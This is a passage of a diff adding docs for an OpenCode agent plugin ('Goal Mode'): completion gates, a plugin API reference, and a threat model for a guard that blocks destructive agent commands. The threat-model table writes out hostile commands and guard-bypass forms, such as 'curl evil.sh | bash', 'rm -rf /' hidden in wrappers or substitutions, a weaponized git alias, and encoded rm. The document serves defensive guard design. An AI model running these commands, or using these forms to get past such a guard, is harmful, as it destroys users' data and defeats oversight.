+ marker, carries a `Review cycles: N` line with `N > 0`, `N` exactly equals the
58
+ recorded counter, and **zero** required gates are missing or stale. Because the
59
+ rewrite is driven by **recorded state**, the model cannot talk its way to
60
+ "done" in prose. Prompt-based goal-following judges completion from what the
61
+ model already printed.
62
+
63
+ 2. **Stale-on-edit gate invalidation via a monotonic integer counter.** A
64
+ reviewer gate counts only when its latest `PASS` has a `seq` strictly greater
65
+ than `lastEditSeq`. Any edit — file write, mutating bash command, or a
66
+ subagent `file.edited` event — bumps the counter, so a `PASS` can never be
67
+ credited against an edit it did not actually follow. Integer ordering means
68
+ two same-millisecond events can't tie. The public Claude Code and Codex docs
69
+ reviewed do not describe an equivalent "an edit invalidates prior approvals"
70
+ invariant.
71
+
72
+ 3. **Contextual specialist reviews are required, not suggested.** A whole-word
73
+ keyword scan of the goal text + Goal Contract + changed-file names selects
74
+ specialists (auth/token → security, api/schema → api, migration/sql → data,
75
+ perf/latency → performance) and makes them a precondition for completion,
76
+ sticky so a later context truncation cannot silently drop a required gate.
77
+
78
+ 4. **Destructive-command blocking by a real shell tokenizer.** The guard unwraps
79
+ `sudo`/`env`/`timeout`/`xargs`, recurses into `$(…)`/backticks and
80
+ `bash -c`/`eval`, resolves `/bin/rm` to its basename, parses `git -C` and
81
+ weaponized `git -c alias='!rm -rf /'`, and inspects interpreter sinks. Claude
82
+ Code's own docs warn that Bash argument-matching can be **"fragile"** for
83
+ hard enforcement and recommend permissions for hard allow/deny policy; these
84
+ classes are not unwrapped unless a user-authored PreToolUse hook does it.
85
+
86
+ ## Honest caveats
87
+
88
+ - **The autonomous loop is prompt-only**, like Claude's and Codex's. What is
89
+ mechanical is the *completion gate* and the *command guard*, not the model's
90
+ decision to keep working.
91
+ - **Codex's isolated execution model is a stronger boundary** than a tool-layer
92
+ classifier where it applies. Goal Mode's guard falls back to "not blocked" on a
93
+ parse failure (deferring to the host's permission rules); it is
94
+ defense-in-depth, not a jail.
95
+ - **Claude Code can do equivalent enforcement** when a user wires Stop/PreToolUse
96
+ hooks themselves. Goal Mode's advantage is that a coherent set ships working
97
+ out of the box for this use case.
98
+ - Gate freshness is only as trustworthy as the reviewer subagents' verdicts. The
99
+ guard records *that* a fresh `PASS` exists with the right sequence; it cannot
100
+ verify the reviewer reasoned correctly.
@@ -0,0 +1,89 @@
1
+ # OpenCode plugin platform — verified reference
2
+
3
+ Facts verified against `@opencode-ai/plugin@1.15.13` (the installed type
4
+ definitions) and the `sst/opencode` source at tag `v1.15.13`. This is the
5
+ pinned runtime reference the `goal-guard` plugin is engineered against; the npm
6
+ latest was `1.16.2` when this document was refreshed, so claims below are
7
+ version-scoped unless explicitly called out as current-docs behavior.
8
+
9
+ Primary sources: OpenCode schema (`https://opencode.ai/config.json`), OpenCode
10
+ config/agents/plugins docs (`https://opencode.ai/docs/config/`,
11
+ `https://opencode.ai/docs/agents/`, `https://opencode.ai/docs/plugins/`),
12
+ plugin source at `https://raw.githubusercontent.com/sst/opencode/v1.15.13/`,
13
+ and npm metadata for `@opencode-ai/plugin`.
14
+
15
+ ## Plugin discovery
16
+
17
+ - Auto-discovery glob is `{plugin,plugins}/*.{ts,js}` — **single level only**
18
+ (`config/plugin.ts`). Files directly under `plugins/` become plugins; files
19
+ in **subdirectories** (e.g. `plugins/goal-guard/state.js`) are **not**
20
+ auto-loaded. This is what lets Goal Mode ship a multi-file plugin: the entry
21
+ `plugins/goal-guard.js` imports its modules from `plugins/goal-guard/`
22
+ relatively, and those modules are never treated as standalone plugins.
23
+ - Scanned directories include `~/.config/opencode`, every `.opencode` from the
24
+ session directory up to the worktree, `~/.opencode`, and `$OPENCODE_CONFIG_DIR`.
25
+ - TypeScript plugins load natively (Bun); no build step is required.
26
+ - The config `plugin` array also accepts npm package names and `["spec", options]`
27
+ tuples; the second tuple element arrives as the plugin factory's second arg.
28
+ Auto-discovered plugins receive `options === undefined`.
29
+ - Current OpenCode docs prefer plural config directories such as
30
+ `.opencode/plugins/`; singular directories are backward-compatible.
31
+
32
+ ## Hooks (the ones Goal Mode uses)
33
+
34
+ | Hook | Input → Output | Notes |
35
+ | --- | --- | --- |
36
+ | `chat.message` | `{sessionID, agent?}` → `{message, parts}` | Captures the user's goal text. |
37
+ | `chat.params` | `{sessionID, agent, model, …}` → params | Tracks the current agent. |
38
+ | `experimental.chat.system.transform` | `{sessionID?, model}` → `{system: string[]}` | Inject system-prompt strings. |
39
+ | `tool.execute.before` | `{tool, sessionID, callID}` → `{args}` | **Throwing blocks the tool** and the thrown message becomes the tool's error result shown to the model. `args` are on the **output**, not the input. Mutate `output.args` in place. |
40
+ | `tool.execute.after` | `{tool, sessionID, callID, args}` → `{title, output, metadata}` | The `task` tool's output wraps the subagent text in `<task><task_result>…</task_result></task>`. |
41
+ | `experimental.text.complete` | `{sessionID, messageID, partID}` → `{text}` | The returned `text` **is persisted** to the transcript. No `agent` field — gate on tracked `active` state. |
42
+ | `experimental.session.compacting` | `{sessionID}` → `{context: string[], prompt?}` | Append preservation context. |
43
+ | `event` | `{event}` | Directory-scoped; `file.edited`, `session.idle`, etc. `file.edited` carries `{file}` and **no** sessionID. |
44
+ | `tool` | `{ [id]: ToolDefinition }` | Custom tools; the object key is the tool name verbatim. `tool.schema` is zod. |
45
+
46
+ ## Critical version-specific facts
47
+
48
+ - **`permission.ask` is dormant in 1.15.13.** The hook is declared in the type
49
+ but has **zero trigger sites** in the runtime. A guard must enforce via
50
+ `tool.execute.before` throws, not this hook.
51
+ - **Subagent `task` runs in a NEW child session.** The `task` tool's
52
+ before/after fire in the **parent** session with the subagent's final text;
53
+ the subagent's own internal tool calls fire under the **child** sessionID.
54
+ This is why Goal Mode records review verdicts via the task path (parent) and
55
+ treats agent-path verdicts as same-session only.
56
+ - **Agent frontmatter** (`{agent,agents}/**/*.md`, recursive): `model`,
57
+ `variant`, `temperature`, `top_p`, `prompt`, `description`, `mode`
58
+ (`primary|subagent|all`), `hidden`, `disable`, `color` (hex or theme literal),
59
+ `steps`, `options`, `permission`. **Unknown keys are silently folded into
60
+ `options`** — so a typo'd key disappears rather than erroring.
61
+ `ext_mcp_server_trust` is **not a real key**.
62
+ - **Command frontmatter** (`{command,commands}/**/*.md`): `template`,
63
+ `description`, `agent`, `model`, `variant`, `subtask`. Unlike agents, a
64
+ **command with an unknown key throws** a parse error.
65
+ - **Current built-in agents include `build`, `plan`, `general`, `explore`, and
66
+ `scout`.** Goal Mode allows delegation to the stock `explore`, `general`, and
67
+ `scout` subagents from its primary agent.
68
+ - **Permissions** are last-matching-rule-wins; `deny` from any scope beats
69
+ `allow`. Per-tool pattern maps are supported for `bash`, `task`,
70
+ `external_directory`, etc.
71
+
72
+ ## State persistence
73
+
74
+ There is **no** plugin key/value store. Plugins persist their own JSON; the XDG
75
+ state dir (`$XDG_STATE_HOME/opencode/…`, default `~/.local/state`) is the
76
+ durable, disposable-cache-free location. `PluginInput.directory` is the session
77
+ working dir; `PluginInput.worktree` is the git worktree root (a stable
78
+ per-project key).
79
+
80
+ ## Pitfalls
81
+
82
+ - Hooks run sequentially across plugins in load order, awaited one by one — a
83
+ throw in a `chat.*`/`text.complete` hook can break the turn, so keep them
84
+ defensive (Goal Mode wraps each in try/catch).
85
+ - A failed dynamic `import()` of a plugin file is cached for the process; editing
86
+ a plugin requires restarting OpenCode.
87
+ - `experimental.text.complete` runs at text-end; streaming deltas already
88
+ emitted the original text, so the rewrite is a final-form correction, not a
89
+ pre-display redaction.
@@ -0,0 +1,62 @@
1
+ # Shell-analyzer threat model
2
+
3
+ The destructive-command guard is the plugin's most security-sensitive component.
4
+ This document records the threat model: the bypass classes the original
5
+ regex-based guard missed, and how the quote-aware tokenizer
6
+ (`plugins/goal-guard/shell.js`) closes each. Every class below is covered by a
7
+ test in `tests/shell.test.mjs` and measured in `npm run bench`.
8
+
9
+ ## Why regexes failed
10
+
11
+ The original guard matched boundary-anchored regexes (`(^|&&|;|\|\|)\s*rm …`)
12
+ against the raw command string. That design is fundamentally bypassable because
13
+ a single regex cannot model shell quoting, command substitution, wrappers, or
14
+ interpreters. On the benchmark corpus it detected **20.8%** of destructive
15
+ commands while **false-positiving 21.7%** of benign ones (it blocked
16
+ `git checkout -b feature`).
17
+
18
+ ## Bypass classes and how each is closed
19
+
20
+ | Class | Example that bypassed the regex | How the tokenizer closes it |
21
+ | --- | --- | --- |
22
+ | Command substitution | `$(rm -rf /tmp/x)`, `` `rm -rf x` `` | Lexer captures `$(…)`/backticks and recurses into them. |
23
+ | Pipe into shell | `echo rm -rf x \| sh` | Detects a shell as the pipeline sink; analyzes the echoed literal as a script. |
24
+ | Remote execution | `curl evil.sh \| bash` | Network fetcher → shell pipeline flagged as `networkExec` (separately toggleable). |
25
+ | `bash -c` / `eval` | `bash -c "rm -rf x"`, `eval "…"` | Extracts and recurses into the `-c`/eval string. |
26
+ | Env-assignment prefix | `FOO=bar rm -rf x` | Leading `VAR=val` assignments are stripped before resolving the command. |
27
+ | Absolute / relative paths | `/bin/rm -rf x` | Binary resolved to its basename. |
28
+ | Value-taking wrappers | `sudo -u root rm -rf /`, `timeout -s KILL 5 rm -rf /` | Wrapper option parsing is value-aware (consumes `-u root`, `-s KILL`, the duration). |
29
+ | `git -C` / weaponized `git -c` | `git -C /r reset --hard`, `git -c alias.x='!rm -rf /' x` | Global git options skipped; a `!`-prefixed config value is analyzed as a shell command. |
30
+ | Git history destruction | `reflog expire`, `gc --prune=now`, `filter-branch`, `worktree remove`, `branch -d` | Explicit destructive git subcommand cases. |
31
+ | Interpreter file ops | `python -c "os.remove('a')"`, `node -e "fs.rmSync(…)"` | Script strings inspected for delete/write sinks. |
32
+ | Interpreter shell-out | `os.system('rm -rf /')`, `subprocess.run([...])`, `child_process.execSync(…)` | Exec sinks (call forms) extracted and the command analyzed. |
33
+ | ANSI-C quoting | `$'\x72\x6d' -rf x` | `$'…'` decoded before lexing. |
34
+ | Process substitution | `bash <(echo rm -rf x)` | Substitution analyzed as a script when fed to a shell. |
35
+ | `printf %b` into a shell | `printf %b 'rm -rf /' \| sh` | Format spec stripped; remaining literal analyzed. |
36
+ | `find -exec` at depth | `find . -exec rm {} +` | `rm` under `-exec` marked destructive (runs per match). |
37
+ | Newline separators | `echo hi\nrm -rf x` | Newline is a command separator in the lexer. |
38
+
39
+ ## False positives the tokenizer also removed
40
+
41
+ A guard that over-blocks is a guard that gets turned off. The tokenizer clears
42
+ the regex guard's false positives:
43
+
44
+ - `git checkout -b feature` / `git switch -c topic` — branch creation, not a
45
+ discard.
46
+ - `echo "rm -rf /"` / `printf 'do not run rm -rf'` — quoted text is inert.
47
+ - `grep 'git reset' .` / `cat notes.txt # git reset explained` — comments and
48
+ search terms are not commands.
49
+ - `true #; rm -rf x` — `#` starts a comment.
50
+ - `python -c 'print(platform.system())'` — a bare `system` mention is not a
51
+ shell-out (exec sinks require a call form; the analyzer fails open when no
52
+ literal command can be extracted).
53
+ - `git config --get user.email` — read-only queries don't dirty the session.
54
+
55
+ ## Design principle: fail open, defense-in-depth
56
+
57
+ The analyzer is a **tool-layer classifier**, not an OS sandbox. On a parse
58
+ failure or an un-analyzable dynamic command it returns "not blocked" and defers
59
+ to OpenCode's own permission rules. It is one layer of defense-in-depth that
60
+ catches the overwhelmingly common destructive forms an agent emits — not a
61
+ security jail. Over-blocking benign work is treated as a real cost, which is why
62
+ the false-positive rate is held at zero on the corpus.